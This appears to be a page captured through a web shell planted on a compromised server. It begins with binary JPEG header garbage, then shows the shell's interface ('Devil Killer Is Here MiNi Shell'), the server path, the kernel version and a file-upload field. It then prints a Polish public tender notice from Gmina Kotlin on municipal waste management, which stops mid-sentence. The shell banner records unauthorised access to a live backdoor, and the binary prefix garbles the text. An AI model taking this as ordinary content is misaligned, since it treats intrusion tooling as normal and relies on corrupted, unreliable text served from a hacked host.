JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241029/0057015701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zagospodarowanie odpadów komunalnych pochodzących <br/>z terenu gminy Kotlin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOTLIN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855400</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstańców Wielkopolskich 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kotlin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">7405481</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@kotlin.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kotlin.com</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie odpadów komunalnych pochodzących <br/>z terenu gminy Kotlin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46ceedbe-f2c3-4585-aecc-f0e7b365ff74</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00570157</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00079213/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Zagospodarowanie odpadów komunalnych z terenu Gminy Kotlin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kotlin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kotlin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu następujących narzędzi:<br/>a) pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/kotlin<br/>b) ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal/<br/>nazwa adresata: Urząd Gminy Kotlin<br/>Identyfikator adresata: /15b4ow6xy5/SkrytkaESP<br/>c) poczty elektronicznej: ug@kotlin.com<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się,<br/>aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość”.<br/>3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza opcjonalnie komunikację za pośrednictwem<br/>poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: przetargi@kotlin.com, należy<br/>pamiętać że adres poczty elektronicznej nie służy do składania oferty oraz załączników a jedynie do komunikacji w zakresie<br/>zadawania pytań. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/>na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące<br/>specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za<br/>pośrednictwem platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone<br/>w Regulaminie zamieszczonym na stronie internetowej pod linkiem<br/>w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XXIV SWZ - OCHRONA DANYCH OSOBOWYCH</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem XXIV SWZ - OCHRONA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie kompleksowej usługi zagospodarowania odpadów komunalnych<br/>dostarczonych przez podmiot odbierający i transportujący odpady, wyłoniony w drodze odrębnego przetargu, z terenów<br/>nieruchomości położonych na terenie Gminy Kotlin oraz zagospodarowania odpadów z Punktu Selektywnej Zbiórki<br/>Odpadów Komunalnych (PSZOK) w Wyszkach. Miejscem zagospodarowania odpadów komunalnych będzie instalacja<br/>przetwarzania odpadów komunalnych znajdująca się w odległości nie większej niż 60 km od siedziby Zamawiającego tj.<br/>Kotlin mierzona drogami publicznymi, polegającej na:<br/>1) zbieraniu, magazynowaniu, unieszkodliwianiu (D) oraz przekazywaniu przyjętych odpadów komunalnych z terenu Gminy<br/>Kotlin od 01.01.2024 r. do 31.12.2024 r., przyjmowaniu odpadów komunalnych, wyszczególnionych rodzajowo we<br/>wskazanym i zapewnionym przez Wykonawcę miejscu przyjmowania odpadów których rodzaje i szacunkowe ilości zostały<br/>wskazane w dalszej części przedmiotu zamówienia - tab. 1, a następnie przetworzeniu przyjętych odpadów komunalnych w<br/>procesach odzysku (R) i/lub unieszkodliwiania (D), we wskazanym i zapewnionym przez Wykonawcę miejscu<br/>zagospodarowania odpadów komunalnych, w sposób zgodny z prawem wynikający ze sposobu postępowania z odpadami<br/>oraz wymaganiami wynikającymi z dokumentów zamówienia.<br/>2) realizacji obowiązków sprawozdawczo-informacyjnych,<br/>3) realizacji obowiązków gwarantujących Zamawiającemu możliwości realizacji uprawnień kontrolno-weryfikacyjnych,<br/>4) realizacji usług i obowiązków związanych z wyrażonymi powyżej w pkt 1 – 4) usługami - zwane dalej łącznie „usługą<br/>zagospodarowania odpadów komunalnych”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90510000-5 - Usuwanie i obróbka odpadów</p> <p class="mb-0">90514000-3 - Usługi recyklingu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z Rozdziałem XIX. SWZ - KRYTERIA OCENY OFERT.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość instalacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu.<br/>2. Ustanowione w postępowaniu warunki udziału dotyczą:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej;<br/>2) sytuacji ekonomicznej lub finansowej;<br/>3) zdolności technicznej lub zawodowej.<br/>3. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, tj.:<br/>a) wpisu do Bazy Danych o Odpadach w zakresie wymaganych dla realizacji usług będących przedmiotem zamówienia,<br/>b) zezwolenie na zbieranie wszystkich frakcji odpadów komunalnych będących przedmiotem zamówienia (wg. kodów<br/>wskazanych w OPZ) wydane na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (tekst jedn. Dz. U.<br/>z 2022 r., poz. 699) lub zezwolenie na przetwarzanie wszystkich frakcji odpadów komunalnych będących przedmiotem<br/>zamówienia (wg. kodów wskazanych w OPZ) lub pozwolenie zintegrowane/pozwolenie wydane na podstawie ustawy z dnia<br/>27 kwietnia 2001 r. Prawo Ochrony Środowiska<br/>(t.j. Dz. U. z 2021 r., poz. 1973 ze zmianami) uwzględniające warunki zezwolenia na zbieranie wszystkich frakcji odpadów<br/>komunalnych będących przedmiotem zamówienia (wg. kodów wskazanych w OPZ) w instalacji stanowiącej miejsce<br/>przetwarzania przyjętych odpadów komunalnych<br/>c) albo, w przypadku instalacji położonych poza Rzeczpospolitą Polską:<br/>• uprawnienia dla podmiotu prowadzącego instalację do przetwarzania odpadów zapewniające możliwość przetwarzania<br/>odpadu, zgodnie<br/>z przepisami kraju, w którym instalacja jest prowadzona, oraz<br/>• pisemną umowę pomiędzy podmiotem, który organizuje przemieszczanie (wysyłający) a odbiorcą odpadów, o której mowa<br/>w załączniku nr VII do rozporządzenia Parlamentu Europejskiego i Rady nr 1013/2006 w sprawie przemieszczania odpadów<br/>2) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykonawca wykaże, że<br/>posiada ubezpieczenie odpowiedzialności cywilnej na kwotę min. 300.000,00 zł w okresie nie wcześniejszym niż 3 miesiące<br/>przed złożeniem podmiotowych środków dowodowych potwierdzających spełnienie tego warunku.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może zostać spełniony, przez co<br/>najmniej jednego Wykonawcę w całości w zakresie wymienionym w pkt 1) oraz co najmniej jednego Wykonawcę w całości<br/>w zakresie wymienionym w pkt 2)<br/>3) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna za spełniony warunek dotyczący zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że:<br/>3.1) posiada minimalne doświadczenie:<br/>wykonał lub nadal wykonuje, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>minimum 1 usługę realizowaną na rzecz jednego podmiotu polegającą na zagospodarowaniu odpadów komunalnych o<br/>łącznej masie co najmniej 1050 Mg w ciągu następujących po sobie 12 miesięcy (całość okresu realizacji usług musi<br/>mieścić się w ww. okresie 3 lat) w wartości nie mniejszej niż 500.000,00 zł PLN (brutto) (słownie: pięćset tysięcy złotych<br/>00/100).<br/>Jako usługę, o której mowa wyżej Zamawiający definiuje całość działań dotyczących zagospodarowania odpadów<br/>komunalnych wykonaną przez Wykonawcę, w tym realizowanych na podstawie kilku umów w sposób ciągły na rzecz<br/>jednego Zamawiającego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi zostać spełniony co najmniej<br/>przez jednego wykonawcę.<br/>3.2) dysponuje co najmniej następującym zasobem technicznym (sprzętowym):<br/>a) instalacją / instalacjami do zagospodarowania odpadów komunalnych spełniającą kumulatywnie następujące wymagania:<br/>• umożliwiającą zbieranie i/lub magazynowanie i/lub unieszkodliwianie i/lub przetwarzanie wszystkich kategorii (kodów)<br/>odpadów wskazanych w OPZ,<br/>• wpisaną jako instalacja komunalna na listę prowadzoną przez właściwego miejscowo marszałka województwa (obowiązek<br/>wpisu na listę nie znajduje zastosowania do instalacji przeznaczonej do termicznego przekształcania odpadów komunalnych<br/>zgodnie z przepisami u.o. oraz ustawy z dnia z dnia 23 września 1996 r. o utrzymaniu czystości i porządku w gminach tj. Dz.<br/>U.<br/>z 2022 r. poz. 1297 lub instalacji znajdujących się poza granicami Rzeczypospolitej Polskiej).<br/>• posiadającą wdrożone systemy zarządzania spełniające:<br/>􀀀 normę środowiskową ISO 140001:2015 albo normę równoważną,<br/>􀀀 normę jakościową ISO 9001:2015 albo normę równoważną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 300.000,00 zł.<br/>2. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami tj. wykaz instalacji do przetwarzania odpadów<br/>komunalnych w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - załącznik<br/>nr 7 do SWZ.<br/>3. Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągły również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane należycie wraz z dowodami ich należytego<br/>wykonania – załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Informacji z Krajowego<br/>Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia;<br/>2) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy P.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>UWAGA: Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych (odpisu lub informacji z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej), jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile wykonawca wskazał w formularzu ofertowym dane umożliwiające dostęp do tych dokumentów.<br/>3) Oświadczenia wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 t.j.), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;<br/>4) Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz<br/>z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>5) Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy 